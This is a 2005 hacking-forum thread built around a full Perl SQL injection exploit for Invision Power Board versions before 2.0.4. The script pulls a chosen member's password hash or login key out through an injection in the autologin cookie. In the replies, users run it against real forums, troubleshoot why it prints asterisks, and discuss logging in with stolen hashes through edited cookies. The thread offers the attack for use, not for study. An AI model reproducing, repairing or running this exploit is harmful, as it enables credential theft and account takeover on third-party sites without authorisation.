Articles
|
|
da_cash
May 16 2005, 09:26 AM
CODE
#!/usr/bin/perl
## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
use IO::Socket;
if (@ARGV < 4) { &usage; }
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];
$pass = ($target)?('member_login_key'):('password');
$server =~ s!(http:\/\/)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]
MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr(42);
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}
sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);
while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}
return 0;
}
sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}
sub usage()
{
print q(
Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]
[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute
targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)
e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
}
if anyone will manage to get the member login key then please post your comments here... i've tried it on inv 2.0.0 without success my results was MEMBER ID : 2774 MEMBER_LOGIN_KEY : ********************************
KarachiKing555
May 16 2005, 07:58 PM
i wana check this expoo but its not working it just pastes the these lines CODE
Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]
[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute
targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)
e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
no matter what i doo im using the right syntax is there any probs with the code !! or my active perl setting !! it seeems i can't exec any .pl files !  its justs prints the print part of the .pl script 
thesource
May 16 2005, 08:12 PM
Even when I press option "1" for Version1 boards it still says its trying the setting for Version2. I'll check and see if I can fix it.
Edit:
oops. its
0 for Version 1
and
1 for Version 2
Edit#2:
[~] SEARCHING PASSWORD ... [ DONE ]
MEMBER ID : 1
PASSWORD : ********************************
Wierd^^^^
SecureD
May 20 2005, 09:47 AM
QUOTE(thesource @ May 16 2005, 08:12 PM) ... [~] SEARCHING PASSWORD ... [ DONE ] MEMBER ID : 1 PASSWORD : ******************************** Wierd^^^^ I also get the *****... back.
boshcash
May 22 2005, 03:30 PM
me 2 tested on more than a site i get ********** as password , i think this exploit is going wrong when getting admin hash ..
SkullSplitter
May 24 2005, 04:26 PM
QUOTE(boshcash @ May 22 2005, 03:30 PM) me 2 tested on more than a site i get ********** as password , i think this exploit is going wrong when getting admin hash .. MEMBER ID : 749 PASSWORD : ******************************** tested on an normal user id 
SecureD
May 28 2005, 01:57 PM
QUOTE(SkullSplitter @ May 24 2005, 04:26 PM) QUOTE(boshcash @ May 22 2005, 03:30 PM) me 2 tested on more than a site i get ********** as password , i think this exploit is going wrong when getting admin hash .. MEMBER ID : 749 PASSWORD : ******************************** tested on an normal user id Now i got the new tutorial: http://www.milw0rm.com/id.php?id=1014ANd now i get only 000000000000000000000000000000 as hash... :S
cr00ks
Jun 3 2005, 08:56 AM
CODE Now i got the new tutorial:
http://www.milw0rm.com/id.php?id=1014
ANd now i get only 000000000000000000000000000000 as hash... :S You must frist rune "Perl Package Manager" in this past "install LWP::UserAgent" open new cmd and now try exploit 
SecureD
Jun 4 2005, 05:25 AM
QUOTE(cr00ks @ Jun 3 2005, 08:56 AM) CODE Now i got the new tutorial:
http://www.milw0rm.com/id.php?id=1014
ANd now i get only 000000000000000000000000000000 as hash... :S You must frist rune "Perl Package Manager" in this past "install LWP::UserAgent" open new cmd and now try exploit I did, but doesnt work either.
KarachiKing555
Jun 11 2005, 10:55 AM
same results 1: 0 2: 0 3: 0 4: 0 5: 0 6: 0 7: 0 8: 0 9: 0 10: 0 11: 0 12: 0 13: 0 14: 0 15: 0 16: 0 17: 0 18: 0 19: 0 20: 0 21: 0 22: 0 23: 0 24: 0 25: 0 26: 0 27: 0 28: 0 29: 0 30: 0 31: 0 32: 0 Final Hash: 00000000000000000000000000000000 // milw0rm.com [2005-06-08]
Iced_Eagle
Jun 27 2005, 05:14 AM
I couldn't figure out the LWP::UserAgent one for some reason... (I log into shell, and it says LWP::UserAgent is up to date, yet the exploit doesn't recognize that I have it ?)
The orginal posters though, I get same results!!
*******************
Has anyone seen a working one of these yet?
aelphaeis_mangarae
Jun 27 2005, 06:16 AM
I have had the same problem as everybody else...
You think possibly that this vulnerability isn't real, and that some how people have just taken the guys word for it and assume it exists?
JeiAr
Jun 27 2005, 11:55 AM
Well, I am the guy that discovered the issue, and yes it is real, and very dangerous as it allows you to not only get the hash, but also log in with that hash via the very same feature that you are trying to exploit. I think alot of the exploit code doesn't work because I do not see a "Host:" field in the headers. As for the various LWP Versions I have seen all seem to work. Did any of you actually try to manually verify the issue by sending modified HTTP headers?
JeiAr
Jun 27 2005, 12:01 PM
Also, you need to go read this aelphaeis_mangarae http://www.simplemachines.org/community/in...p?topic=39395.0I will be releasing my advisory in about a week, but script kiddies already got some exploit code and are exploiting this issue already. Hope this helps 
Iced_Eagle
Jun 28 2005, 07:54 PM
Hmmm wierd, I ran the exploit again (original posters) and I get a new error... QUOTE Can't use an undefined value as a symbol reference at C:\Webserver\webroot\r57ibp2.pl line 134. I don't know perl at all, so I would have no clue where to start debugging this thing. *Edit* Oh, and I tried the milw0rm one... Same results (a bunch of zero's). *Edit2* I tried milw0rm again, and I seem to have got a working hash.. Trying it out now. *Edit3* Hash didn't seem to work with cookie method... I'm trying something else... Oh, and it's wierd. The exploit so far has worked on one forum, with one user ID... I've tried every other UserID on that forum and it says "Non-Exploitable!" but when I go back to the other UserID, it still works... Wierd. *Edit4* Okay, wow lots of edits (better than double posting, agreed?) but I figured out why it won't work with the cookie method... Firefox erases my changes!!! It says right at the top not to edit the cookie file, and when I go to the site, it simply erases my cookies and won't log me in as the user. Any suggestions? I'm using Mozilla Firefox 1.0.4
coolspot31
Aug 1 2005, 08:30 AM
How did you manage to get a working hash? I too am getting the results of 0's with the miliworm one, and *'s with the original poster's. LWP::UserAgent is up to date.
ShoCK FX
Aug 2 2005, 06:38 AM
If you get all *'s it's because you haven't modified the sciprt... You need to modify it slighlty so it gives you the right output, figure out how, it's not hard
Tiago2
Aug 7 2005, 02:26 PM
QUOTE(ShoCK FX @ Aug 2 2005, 06:38 AM) If you get all *'s it's because you haven't modified the sciprt... You need to modify it slighlty so it gives you the right output, figure out how, it's not hard I don't know perl. Im having some trouble figuring out what i need to change? Do i need to modifie this line? else { $allchar .= chr(42); }
Tiago2
Aug 11 2005, 01:43 PM
im completely lost arhhh 
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
|
